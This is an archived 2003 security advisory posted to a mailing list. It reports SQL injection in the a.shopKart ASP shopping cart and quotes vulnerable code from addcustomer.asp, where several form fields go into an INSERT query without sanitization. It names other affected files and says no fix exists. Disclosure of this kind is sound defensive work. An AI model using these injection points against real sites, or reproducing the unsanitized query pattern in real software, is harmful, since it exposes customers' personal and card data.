a.shopKart Shopping Cart remote vulnerabilities

From: Ignacio Vazquez (infosecmanagerat_private)
Date: Wed Jan 08 2003 - 08:02:39 PST

Next message: Sean Kelly: "Re: ps information leak in FreeBSD"

Previous message: dong-h0un yoU: "Tanne Remote format string exploit (Proof of Concept)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Centaura Technologies Security Research Lab Advisory

Product Name: a.shopKart Web Shopping Cart
Systems: Windows NT/2000/.NET Server
Severity: High Risk
Remote: Yes
Category: Insuficient input checking
Vendor URL: http://www.urlogy.com
Advisory Author: Ignacio Vazquez
Advisory URL: http://www.centaura.com.ar/infosec/adv/ashopkart.txt
Revised-Date: January 9, 2003
Advisory Code: CTADVIIC046


.:Introduction

a.shopKart is a free shopping cart developed in ASP.
Its features include product updating, customer management, etc

.: Impact
An attacker can access sensitive information within the system
database.

This can lead to sensitive personal information disclosure, including
but not limiting to credit card information, address and telephone
numbers.

.: Description
The program is vulnerable in several spots along the code.
There's a basic input checking function ( TwoSingleQ(str) ) but
it's not applied everywhere, leaving potencial exploitable holes.

The following statement shows the vulnerable points 
(taken from addcustomer.asp).

Here "zip", "state", "country", "phone" and "fax" are unchecked for
SQL Injection vulnerabilities.

sqlAdd = "INSERT INTO customers(cfirstname,clastname,cemail,caddress"
	If Request.Form("address2") <> "" Then
		sqlAdd = sqlAdd & ",caddress2"
	end if
	sqlAdd = sqlAdd & ",ctown,czip"
	If Request.Form("state") <> "" Then
		sqlAdd = sqlAdd & ",cstate"
	End if
	sqlAdd = sqlAdd & ",ccountry,cphone"
	If Request.Form("fax") <> "" Then
		sqlAdd = sqlAdd & ",cfax"
	End if
	sqlAdd = sqlAdd & ") VALUES("
	sqlAdd = sqlAdd & "'" & TwoSingleQ(fname) & "'"
	sqlAdd = sqlAdd & ",'" & TwoSingleQ(lname) & "'"
	sqlAdd = sqlAdd & ",'" & TwoSingleQ(email) & "'"
	sqlAdd = sqlAdd & ",'" & TwoSingleQ(address) & "'"
	If Request.Form("address2") <> "" Then
	sqlAdd = sqlAdd & ",'" & TwoSingleQ(Request.Form("address2")) & "'"
	end if
	sqlAdd = sqlAdd & ",'" & TwoSingleQ(town) & "'"
	sqlAdd = sqlAdd & ",'" & zip & "'"
	If Request.Form("state") <> "" Then
		sqlAdd = sqlAdd & ",'" & Request.Form("state") & "'"
	End if
	sqlAdd = sqlAdd & ",'" & country & "'"
	sqlAdd = sqlAdd & ",'" & phone & "'"
	If Request.Form("fax") <> "" Then
		sqlAdd = sqlAdd & ",'" & Request.Form("fax") & "'"
	End If
	sqlAdd = sqlAdd & ")"
	
At least addcustomer.asp, addprod.asp, process.asp are vulnerable to
this type of attacks.

.: Official Fix Information

The vendor has been contacted but no fix has been released yet.

-----

Ignacio Vazquez
<ivazquezat_private>

Director of Technology
Security Labs Manager

Centaura Technologies
http://www.centaura.com.ar

Next message: Sean Kelly: "Re: ps information leak in FreeBSD"
Previous message: dong-h0un yoU: "Tanne Remote format string exploit (Proof of Concept)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 08 2003 - 12:27:03 PST